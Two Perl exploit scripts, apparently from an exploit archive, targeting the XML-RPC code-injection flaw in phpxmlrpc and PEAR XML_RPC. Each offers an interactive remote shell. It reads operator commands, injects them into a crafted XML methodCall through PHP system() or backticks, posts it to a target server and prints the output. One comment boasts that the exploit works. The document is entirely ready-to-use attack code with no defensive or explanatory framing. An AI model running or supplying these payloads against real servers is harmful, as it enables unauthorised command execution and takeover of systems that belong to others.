#!/usr/bin/perl -w
# ********************************************************
# XML-RPC Remote Command Execution Exploit By Mike Rifone
# ********************************************************
# This works on da phpxmlrpc, and da PEAR XML_RPC too! All
# you need is to put the url to the server and u get shell
# Dis is my first exploit but hey it works :D ~Mike@Rifone
# ********************************************************

use LWP::UserAgent;

$brws = new LWP::UserAgent;
$brws->agent("Internet Explorer 6.0");

$host = $ARGV[0];

if ( !$host )
{
die("Usage: xmlrpcexec.pl http://pathto/xmlrpcserver");
}

while ( $host )
{

print "xmlrpc\@\#";

$exec = <STDIN>;
$data = "<?xml version=\"1.0\"?><methodCall><methodName>foo.bar</methodName><params><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><name>','')); system('$exec'); die; /*</name></value></param></params></methodCall>";

$send = new HTTP::Request POST => $host;
$send->content($data);
$gots = $brws->request($send);
$show = $gots->content;

if ( $show =~ /<b>([\d]{1,10})<\/b><br \/>(.*)/is )
{
    print $2 . "\n";
}
else
{
 print "$show\n";
}


}

#-------------------------------------------------------#
#                     /|                                #      
#                    | |                                #      
#                    | |                                #      
#       /\   ________| |___                             #      
#      /  \  \_______   __/                             #
#     /    \|\_____  | | _       _  _     _  ()___      #      
#    /  /\  \  ___ \ | |<_>  /  |  |  | || \ || | | |   #      
#   /  /__\  \|   \ || | _  /__ |_ |  | ||_/ || | |_|   #      
#  /  ______  \   | || || |   / |  |  | || \ || |   |   #      
# /  /      \  \  | || || |  /  |_ |_ |_||  \|| | \_|   #      
# \_/       |\_/  | || || | ___ _  _                    #      
#           | |   | || /| |  | |  | ||\/|               #      
#            \|    \||/  \|  | |_ |_||  |               #      
#                            | |  | ||  |               #      
#                            | |_ | ||  |               #      
#                                                       #
#         Original advisory by http://gulftech.org/     #
#         Exploit coded by dukenn (http://asteam.org)   #
#                                                       #
#-------------------------------------------------------

#!/usr/bin/perl

use IO::Socket;

print "XMLRPC remote commands execute exploit by dukenn (http://asteam.org)\n";

if ($ARGV[0] && $ARGV[1])
{
$host = $ARGV[0];
$xml = $ARGV[1];
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "connecterror\n";
while (1) {
   print '['.$host.']# ';
   $cmd = <STDIN>;
   chop($cmd);
   last if ($cmd eq 'exit');
   $xmldata = "<?xml version=\"1.0\"?><methodCall><methodName>test.method</methodName><params><param><value><name>',''));echo '_begin_\n';echo `".$cmd."`;echo '_end_';exit;/*</name></value></param></params></methodCall>";
   print $sock "POST ".$xml." HTTP/1.1\n";
   print $sock "Host: ".$host."\n";
   print $sock "Content-Type: text/xml\n";
   print $sock "Content-Length:".length($xmldata)."\n\n".$xmldata;
   $good=0;
   while ($ans = <$sock>)
      {
       if ($good == 1) { print "$ans"; }
       last if ($ans =~ /^_end_/);
       if ($ans =~ /^_begin_/) { $good = 1; }
      }
     if ($good==0) {print "Exploit Failed\n";exit();}
  }
}
else {
print "Usage: perl xml.pl [host] [path_to_xmlrpc]\n\n";
print "Example: perl xml.pl target.com /script/xmlrpc.php\n";
exit;
}